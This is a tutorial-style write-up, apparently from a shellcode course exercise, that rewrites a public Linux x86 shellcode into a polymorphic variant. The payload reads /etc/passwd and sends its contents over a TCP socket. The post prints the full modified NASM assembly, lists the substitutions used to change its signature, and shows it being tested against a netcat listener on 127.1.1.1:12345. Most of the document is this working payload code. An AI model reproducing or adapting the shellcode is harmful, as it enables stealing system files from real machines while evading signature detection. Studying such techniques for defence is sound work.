6_3 - READING "/ETC/PASSWD"
1 - INTRODUCTION
- Same concepts studied at 6_1 apply in this case.
2 - MODIFYING A SHELLCODE
- The original program to be modified in this practice has the effect of reading the "/etc/passwd" file and sending the content to 127.1.1.1 port 12345
http://shell-storm.org/shellcode/files/shellcode-861.php
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw-PG8hglclEP12w9t3igjVFtpxoIMrCKdjTzeVw3z63wTHZHvbhH-ke1j9JscwE_EyZ5bjrZP4opX37BoTXRGTTah0vSuj30Zrmyn_s90Ss8-H2nw8Y36zMpk4W2uKLGlPKpAhjfGmTPc/s1600/screenshot.1.jpg)
- Let's see 4 possible modifications:
a) Instead of using "inc", adding 1:
; inc ebx
add ebx,0x1
b) When moving between two registers, going around using a third intermediate register, what is useless and harmless but distorts the code:
; mov esi, eax
mov edx, eax
mov esi, edx
c) Using "mov" instead of "push/pop":
; push 0x4
; pop eax
mov eax, 0x4
d) Using "mov" instead of "push":
;push DWORD 0x0101017f ;127.1.1.1
;push WORD 0x3930 ; Port 12345
;push WORD bx
mov dword [esp-4], 0x0101017f ; <- mov instead or push
mov word [esp-6], 0x3930
mov word [esp-8], bx
sub esp,8
- The resulting assembly program of applying these modifications is A6_3.nasm:
section .text
global _start
_start:
; socket
push BYTE 0x66
pop eax
xor ebx, ebx
; inc ebx
add ebx,0x1 ; <-adding 1 to ebx
xor edx, edx
push edx
push BYTE 0x1
push BYTE 0x2
mov ecx, esp
int 0x80
; mov esi, eax
mov edx, eax ; <- going around
mov esi, edx
; connect
push BYTE 0x66
pop eax
; inc ebx
add ebx,0x1 ; <-adding 1 to ebx
;push DWORD 0x0101017f ;127.1.1.1
;push WORD 0x3930 ; Port 12345
;push WORD bx
mov dword [esp-4], 0x0101017f ; <- mov instead or push
mov word [esp-6], 0x3930
mov word [esp-8], bx
sub esp,8
mov ecx, esp
push BYTE 16
push ecx
push esi
mov ecx, esp
; inc ebx
add ebx, 0x1 ; <-adding 1 to ebx
int 0x80
; dup2
mov esi, eax
push BYTE 0x1
pop ecx
mov BYTE al, 0x3F
int 0x80
;read the file
jmp short call_shellcode
shellcode:
push 0x5
pop eax
pop ebx
xor ecx,ecx
int 0x80
mov ebx,eax
mov al,0x3
mov edi,esp
mov ecx,edi
xor edx,edx
mov dh,0xff
mov dl,0xff
int 0x80
mov edx,eax
; push 0x4
; pop eax
mov eax, 0x4 ; <- mov instead of push/pop
mov bl, 0x1
int 0x80
; push 0x1
; pop eax
mov eax, 0x1 ; <- mov instead of push/pop
inc ebx
int 0x80
call_shellcode:
call shellcode
message db "/etc/passwd"
3 - TESTING POLYMORPHISM
- Assembling and linking A6_3.nasm:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-SVCN44JXDjNC4q5AGknsw78wXeWQ5Ure8pSED17hxg01Alt8A3r-0SMvmR8a6hFIAskqTp8clsdt5-zA2GiTbXxEd7bo-PzfZ6UqTseLQ2kOVMlms6qI98NXFo7h4Utl0co_LyExrNSm/s1600/screenshot.2.jpg)
- Extracting the shellcode:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTwmCf5a3j1SvYuR_IBzkCBxYGIRV-UG6NqKgGJgSIi2pMPnVhAmgsU_DqiCFQ0P5x-I5gESG6Y5qG34udoRw27VPNbaqSYbB6FHt-M1S0zsqhkTAMIKjYiBXsP3ZddBwOPQe7jG855kC/s1600/screenshot.3.jpg)
- Applying to ShellcodeTest.c program:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXK0-zAIywpne0JUZ118LMLvRvjH-A-eU_nF0Hum58MRJu2uabfVTpnmc8KT2QXSwO58oJjPMKmvZhW5BBmm5PI0BoSkDU8SvcAAEssaUBAaGNCs0ByD2iSYCVNpgf07gNxoYidOjrfQ7m/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6-cgUi3QX1tDbh-TNpj3QRW5xu3uNg5rCpmZigOFAAsE690IRtMviwWLuMAPF9udtvrYEnTBhzbdllB_d9mNsGWx7JZuS9ZGJycdiIPt-nhHnaDzCsEvti3fFUytYXOBR-vicpjL6r7M/s1600/screenshot.4.jpg)
- Compiling ShellcodeTest.c:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC2zmQdwPUIqGjyQq1WMRDUHDVgSaAA4LBs2Q7mVlf1DAVi2Y4e8GQT40U6LOlddqeV4H73XNfb9fmdIbUyun9d6-pE8mlNhQcBJPL3l_UIBosbKxnpnxOvSh0hJa82UZLDMbkGmZ1g6kg/s1600/screenshot.6.jpg)
- For testing the program, from a new console nc tool is used to listen on 127.1.1.1:12345:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhthhbF7ZgABH3YhZs8GO9clXpH0O7E-RZkeQ0DIdgNpOqQ55SRQalJB4mvzQ6IQMxRWd_K4hURLK1rFfzdXkAR1RUthuP6qnhJGAwN_usRMehwytM0gv6FrvJH1DJ2M2eJJ8b2BDAdESC/s1600/screenshot.7.jpg)
- Executing ShellcodeTest.c the result is the same as the original program, the file "/etc/passwd" can be read on address 127.1.1.1 port 12345:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq7QDL3dwqwkAEBMD7G91GxMa9whh1OfWFCirIQMrPWz78mDD-9FSFUJ4oPcyyygKeMOf1RNTGflB9a0jwqCLG0HOHiw0iI6Stf4b3GYXAIxbBy4sMkn5iASaldYzmaQ0Oau6EUYt2uiwl/s1600/screenshot.11.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UtzKUSHzNo2TJZrLt_YAksPV_76elkqiUyMvuj4-7jA3VCvLBDtStxxuKaq81j9TFGPIV_f6hBCq3cRIVZRALuvkw4yva43GmsoKQKJCAGbeKMY7nAgn2pEgzwVcGugR8SW8EsY7qobV/s1600/screenshot.10.jpg)
- While the original shellcode had 111 Bytes, the new one has got 104 Bytes. It means a reduction of 6.3%.